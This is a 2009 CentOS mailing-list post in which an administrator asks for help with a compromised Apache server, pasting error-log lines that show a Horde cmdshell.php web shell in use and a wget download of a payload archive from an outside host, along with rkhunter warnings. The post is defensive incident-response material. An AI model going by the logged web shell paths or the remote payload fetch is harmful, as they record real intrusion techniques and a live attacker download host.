[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
Linux Advocate
linuxhousedn at yahoo.com
Sun Jun 14 05:37:08 UTC 2009
replies below...
----- Original Message ----
> From: Filipe Brandenburger <filbranden at gmail.com>
> To: CentOS mailing list <centos at centos.org>
> Sent: Saturday, June 13, 2009 9:58:51 PM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
>
> I suggest you start by looking at Apache's logs,
Filipe, good idea. will do.
>look for very strange
> URLs hat have nothing to do with the applications you have there, like
> .exe files (IIS attacks) or other .cgi or .php files that will give
> you 404 errors. Also look for things in the error_log file. And then
> look for other accesses from the same IP (assuming it's always from
> the same IP) to files that do exist, this will probably lead you to
> what was used to break in. Continue the investigation from there.
A. I have found susicious ip around the dates ( based on the dates of files in the atack folder) when i think this break-in could hv hapened
86.126.71.74 <--- frm romania ( i am in singapore )
This ip seemed to have generated the most error messages. they are other not-frm-country IPs but way way less errors frm them.
They are many error messages (generated by 86.126.71.74) in the apache error log as below;
[Mon May 18 05:39:39 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer:
http://ip.of.machine.i.removed.for.this.post/horde/admin/cmdshell.php
./x: line 19: log: No such file or directory
[Tue May 19 02:27:32 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer:
http://60.54.174.146/horde/admin/cmdshell.php?Horde=e20jlll1ds0eudvsdqrsrbb7c2
[Thu May 21 19:29:52 2009] [error] [client 80.179.16.201] script '/var/www/html/sys_to_server.php' not found or unable to stat
http://60.54.174.146/horde/admin/cmdshell.php?Horde=f49bd7r2sb0ut885k3t5vq0ns0
cat: vuln.txt: No such file or directory
<--- this vuln.txt is in the /dev/shm/unix/atack folder and also in the /var/tmp/unix/atack folder. Was the atacker looking for this file and then plant it later? or something like that ?
[Wed May 27 12:20:28 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer:
http://60.54.174.146/horde/admin/cmdshell.php
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
What does Len 255 < 256 indicate? Some kind of buffer overflow?
B .Can i conclude that the attacker came through the horde framework ( cmdshell.php) ? The horde framework was installed from the centos repo.....!!!
[root at fwg]# yum info horde
Name : horde
Arch : noarch
Version : 3.1.7
Release : 1.el5.centos
Size : 18 M
Repo : installed
Summary : The common Horde Framework for all Horde modules.
URL : http://www.horde.org/
There are some google hits on cmdshell.php being used to execute arbitrary commands?
There is some exploit called "CmdShell.Horde.ExploitCheck.Decoy"
i havent found more info yet. Any tips on this would be most welcome.
There is also this line in the error log;
[Fri May 22 18:26:56 2009] [notice] SELinux policy enabled; httpd running as context system_u:system_r:httpd_t
Is the line above normal?
C. BUT THE WORST THING OF ALL IS THESE LINES BELOW....
Mon May 25 14:46:50 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer:
http://my.machine.ip.again/horde/admin/cmdshell.php?Horde=7blkurngfdeqsgorrkqobldem7
--14:47:00-- http://mv.do.am/unix.tgz
Rezolvare mv.do.am... 208.100.61.101
Connecting to mv.do.am|208.100.61.101|:80... conectat.
Cerere HTTP trimisă, se aşteaptă răspuns... 200 OK
Dimensiune: 1614224 (1,5M) [application/octet-stream]
Saving to: `unix.tgz'
0K .......... .......... .......... .......... .......... 3% 17,6K 87s
50K .......... .......... .......... .......... .......... 6% 33,7K 64s
100K .......... .......... .......... .......... .......... 9% 33,5K 55s
150K .......... .......... .......... .......... .......... 12% 45,6K 48s
200K .......... .......... .......... .......... .......... 15% 52,8K 42s
250K .......... .......... .......... .......... .......... 19% 50,3K 38s
300K .......... .......... .......... .......... .......... 22% 47,9K 35s
350K .......... .......... .......... .......... .......... 25% 54,8K 32s
400K .......... .......... .......... .......... .......... 28% 48,7K 30s
450K .......... .......... .......... .......... .......... 31% 36,9K 28s
500K .......... .......... .......... .......... .......... 34% 34,6K 27s
550K .......... .......... .......... .......... .......... 38% 32,9K 26s
600K .......... .......... .......... .......... .......... 41% 28,4K 26s
650K .......... .......... .......... .......... .......... 44% 36,7K 24s
700K .......... .......... .......... .......... .......... 47% 34,3K 23s
750K .......... .......... .......... .......... .......... 50% 34,0K 22s
800K .......... .......... .......... .......... .......... 53% 33,1K 20s
850K .......... .......... .......... .......... .......... 57% 47,7K 19s
900K .......... .......... .......... .......... .......... 60% 27,4K 18s
950K .......... .......... .......... .......... .......... 63% 13,0K 18s
1000K .......... .......... .......... .......... .......... 66% 28,3K 16s
1050K .......... .......... .......... .......... .......... 69% 38,1K 15s
1100K .......... .......... .......... .......... .......... 72% 29,3K 13s
1150K .......... .......... .......... .......... .......... 76% 44,1K 11s
1200K .......... .......... .......... .......... .......... 79% 56,6K 10s
1250K .......... .......... .......... .......... .......... 82% 44,7K 8s
1300K .......... .......... .......... .......... .......... 85% 39,8K 7s
1350K .......... .......... .......... .......... .......... 88% 50,8K 5s
1400K .......... .......... .......... .......... .......... 91% 40,2K 4s
1450K .......... .......... .......... .......... .......... 95% 37,3K 2s
1500K .......... .......... .......... .......... .......... 98% 43,1K 1s
1550K .......... .......... ...... 100% 44,5K=45s
14:47:47 (35,1 KB/s) - `unix.tgz' saved [1614224/1614224]
DID THIS GUY ACTUALLY SAVE A FILE ON MY HARD DISK???
AAAAAAHHHHHHHHHHHHHHHHHHHH???????????????
Was this why rkhunter popped out with this warning?
* Filesystem checks
Checking /dev for suspicious files... [ OK ]
Scanning for hidden files... [ Warning! ]
---------------
/etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev
---------------
Please inspect: /usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression) /dev/.udev (directory)
Should i delete these files? are the man files nromally .gz or .bz2 ?
There is also a similar entry, where another file called unix2.tgz was downloaded....
But i cant find these files on the HDisk?
guys i am out of my league here. All assistance is deeply appreciated.
>
> HTH,
> Filipe
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos
More information about the CentOS
mailing list